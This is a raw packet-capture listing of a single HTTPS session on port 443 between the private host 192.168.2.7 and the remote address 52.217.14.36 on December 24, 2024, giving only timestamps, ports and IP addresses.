Dec 24, 2024 08:54:13.026290894 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.032012939 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.032021999 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.032068014 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.032140017 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.032169104 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.032198906 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.032213926 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.039690971 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.039885044 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.039943933 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.039954901 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.088736057 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.137536049 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.137547016 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.137658119 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.137675047 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.182514906 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.183113098 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183121920 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183165073 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183182001 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183212042 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183212996 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.183244944 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.183258057 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.221050024 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.221096992 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.221131086 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.221164942 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.221184969 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.221196890 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.259035110 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.259110928 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.259124994 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.259143114 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.259186029 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.259217978 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.259232998 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.307512999 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.339425087 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.339437008 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.339476109 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.339490891 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.339541912 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.339572906 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.339596987 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.339607954 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.342977047 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363584995 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363630056 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363642931 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363656044 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363678932 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.363713026 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.363734961 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.385442972 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.385452986 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.385597944 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.385612011 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.385618925 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.385652065 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.385668039 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.405360937 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.405395985 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.405406952 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.405438900 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.405441046 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.405473948 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.405488968 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.405518055 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.418616056 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.418641090 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.418669939 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.418680906 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.418704987 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.418723106 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.420471907 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.432570934 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.432590961 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.432626963 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.432637930 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.432661057 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.479479074 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.479492903 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.520195007 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.520222902 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.520258904 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.520283937 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.520303965 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.520337105 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.532594919 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532630920 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532639980 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532658100 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.532670021 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532677889 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532716036 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.532753944 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.532793999 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.543500900 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.543509960 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.543553114 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.543590069 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.543601990 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.543626070 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.543648005 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.543728113 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.553630114 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.553648949 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.553733110 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.553742886 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.563127995 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.563154936 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.563266039 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.563285112 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.572742939 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.572792053 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.572823048 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.572832108 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.572846889 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.572865009 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.572896004 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.581851006 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.581875086 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.581902027 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.581949949 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.581964016 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.581981897 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.590881109 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.590905905 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.590965986 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.590982914 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.590992928 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.635642052 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.715683937 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.715694904 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.715745926 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.715796947 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.715821981 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.715833902 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.715859890 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.716345072 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.721640110 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.721662045 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.721726894 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.721736908 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.729322910 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.729371071 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.729409933 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.729415894 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.729434967 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.729450941 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.729473114 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.737082958 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.737102985 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.737171888 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.737193108 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.737231016 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.737263918 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.743515015 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.743531942 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.743607998 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.743618011 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.750423908 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.750474930 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.750507116 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.750518084 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.750593901 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.757978916 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.758044004 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.758094072 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.758105993 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.758124113 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.807509899 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.807524920 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.855329990 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.903171062 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.903182983 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.903223991 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.903242111 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.903328896 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.903361082 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.903381109 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.903403044 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.904028893 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.909967899 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.910000086 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.910031080 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.910084963 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.910084963 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.910106897 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.918013096 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.918050051 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.918081999 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.918093920 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.918114901 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.918150902 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.918150902 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.924541950 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.924566984 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.924622059 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.924650908 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.924650908 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.924675941 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.924716949 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.931279898 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.931303024 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.931361914 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.931387901 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.931402922 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.937685013 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.937726021 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.937788010 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.937788010 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.937820911 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.945894003 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.945940971 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.945966005 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.945976019 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.945990086 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.946011066 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.946053028 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.952203989 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.952224016 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.952337027 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.952351093 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.952713966 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:13.952727079 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:13.995249033 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.098917007 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.098941088 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.099011898 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.099100113 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.099128008 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.099139929 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.105710030 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.105732918 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.105807066 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.105839014 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.105856895 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.112642050 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.112684011 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.112715960 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.112725973 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.112750053 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.112771988 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.112791061 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.119415998 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.119441986 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.119524956 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.119554043 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.119568110 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.119604111 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.120369911 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.126734018 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.126763105 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.126791954 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.126830101 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.126872063 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.133558989 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.133605957 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.133636951 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.133666992 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.133683920 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.140301943 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.140347958 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.140381098 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.140413046 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.140446901 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.140481949 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.140506029 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.287641048 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.287678003 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.287722111 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.287750959 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.287785053 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.287785053 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.288356066 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.294323921 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.294348955 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.294388056 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.294429064 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.294445038 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.301165104 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.301199913 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.301269054 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.301269054 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.301300049 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.308978081 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.309025049 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.309062958 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.309185982 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.309185982 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.309220076 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.309710026 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.315339088 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.315372944 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.315814018 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.315814018 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.315823078 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.316000938 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.316056013 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.322002888 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.322033882 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.322091103 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.322091103 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.322101116 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.328900099 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.328937054 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.329008102 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.329009056 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.329015017 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.336553097 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.336596966 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.336630106 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.336651087 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.336659908 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.336678982 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.336759090 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.351450920 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.482866049 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.482897997 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.482943058 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.482953072 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.482990980 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.483023882 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.489598036 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.489623070 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.489681005 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.489722967 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.489753008 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.496387959 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.496407032 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.496468067 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.496504068 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.496519089 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:14.503321886 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.503369093 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:14.503386021 CET	49752	443	192.168.2.7	52.217.14.36
